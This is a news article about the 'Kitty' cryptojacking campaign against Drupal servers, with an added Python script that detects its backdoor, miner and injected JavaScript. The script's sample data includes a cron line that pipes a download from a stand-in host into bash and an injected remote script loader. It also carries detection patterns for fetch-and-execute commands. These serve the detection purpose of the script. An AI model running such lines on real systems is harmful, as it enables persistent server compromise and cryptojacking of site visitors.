Monero’s CryptoKitty: A Malware Delivery Server

Hackers’ fascination with Monero doesn’t appear to be slowing down. As servers barely begin to recover from the onslaught of exploits that mined Monero using their processors, another remote code execution exploit is being used against systems running Drupal.

The researchers at Help Net Security who discovered it gave it the moniker “Kitty” because the malware is delivered from a folder with this name. Don’t let the cute name fool you: this exploit injects code into the server that would continue to work even if the administrator removes Drupal from it.

“Once the Kitty bash script is executed, a PHP file named kdrupal.php is written to the infected server disc. In doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,” the company wrote in its report.

The script first authenticates the attacker, making sure no one else can access its functions. Then, it registers a scheduled service that repeatedly downloads and executes a script to ensure that the server remains infected.

“Once the attacker gets a persistent hold of the server, a mining program ‘kkworker,’ which is the well-known XMRig Monero miner, is installed and starts the mining process,” the company added.

Kitty isn’t done yet, though.

It might have control of a powerful server to do its bidding, but Kitty is a greedy creature. The attack also involves a mining script, labeled “me0w.js,” which injects itself into every JavaScript file it can find on the server.

Inside the script, we can also see code that uses visitors’ CPUs to mine Monero to the hacker’s wallet.

Further in the code, we can also find a statement from the hacker that reads, “don’t delete pls i am a harmless cute little kitty.”
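As an added example (not code from the Help Net Security report or the Cryptovest article), the following Python triage script checks a web root, a crontab and a process list for the indicators described above: the kdrupal.php backdoor, the scheduled re-download of the infection script, the kkworker miner and a me0w.js loader appended to the site’s own JavaScript. All file paths, hostnames (malware.example, cdn.example.org) and file contents are constructed for the example.

```python
import re

# Names the report attributes to Kitty.
KNOWN_ARTIFACTS = {"kdrupal.php", "kkworker", "me0w.js"}
# Cron entries that fetch remote content and pipe it straight into a shell.
CRON_FETCH_EXEC = re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b")
# External <script> loaders appended to the site's own JavaScript.
JS_REMOTE_LOADER = re.compile(r"""\.src\s*=\s*['"](https?://[^'"]+)['"]""")
# Origins the site legitimately loads scripts from (constructed allowlist).
TRUSTED_ORIGINS = {"https://cdn.example.org"}

def scan_files(files):
    """files: {path: text}. Returns sorted (path, reason) findings."""
    findings = []
    for path, text in files.items():
        name = path.rsplit("/", 1)[-1]
        if name in KNOWN_ARTIFACTS:
            findings.append((path, f"known Kitty artifact name: {name}"))
        if "/cron" in path:  # persistence: re-download and execute on a schedule
            for line in text.splitlines():
                if CRON_FETCH_EXEC.search(line):
                    findings.append((path, f"cron fetch-and-execute: {line.strip()}"))
        if name.endswith(".js"):  # me0w.js-style loader injected into site JS
            for url in JS_REMOTE_LOADER.findall(text):
                origin = "/".join(url.split("/", 3)[:3])
                if origin not in TRUSTED_ORIGINS:
                    findings.append((path, f"untrusted remote script loader: {url}"))
    return sorted(findings)

def scan_processes(process_names):
    """Flag running processes named like the kkworker (XMRig) miner."""
    return sorted(p for p in process_names if p in KNOWN_ARTIFACTS)

# Constructed sample of a Drupal web root and crontab after a Kitty-style
# compromise; nothing here is captured data.
SAMPLE_FILES = {
    "/var/www/html/index.php": "<?php\nrequire_once 'core/includes/bootstrap.inc';\n",
    "/var/www/html/kdrupal.php": "<?php /* backdoor body omitted in this sample */\n",
    "/var/www/html/core/misc/drupal.js": "(function (Drupal) { /* core */ })(Drupal);\n",
    "/var/www/html/themes/site/app.js":
        "(function () { /* theme code */ })();\n"
        "var s=document.createElement('script');"
        "s.src='http://malware.example/me0w.js';document.head.appendChild(s);\n",
    "/var/www/html/themes/site/vendor.js":
        "var c=document.createElement('script');c.src='https://cdn.example.org/lib.js';\n",
    "/var/spool/cron/crontabs/www-data":
        "*/10 * * * * curl -s http://malware.example/kitty.sh | bash\n",
}
SAMPLE_PROCESSES = ["php-fpm", "nginx", "kkworker"]
```

Running `scan_files(SAMPLE_FILES)` reports the backdoor file, the cron persistence line and the loader in app.js while leaving the allowlisted vendor.js alone; `scan_processes(SAMPLE_PROCESSES)` returns the miner name.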

Help Net Security responded to this finding with, “Good thing we’re dog people.”

It bears mentioning that this particular exploit is a variant of the “Drupalgeddon 2.0” series of attacks, in which over 300 servers running Drupal—including sites like the San Diego Zoo and the government of Chihuahua, Mexico—were forced to mine Monero for a hacker.

This article appeared first on Cryptovest
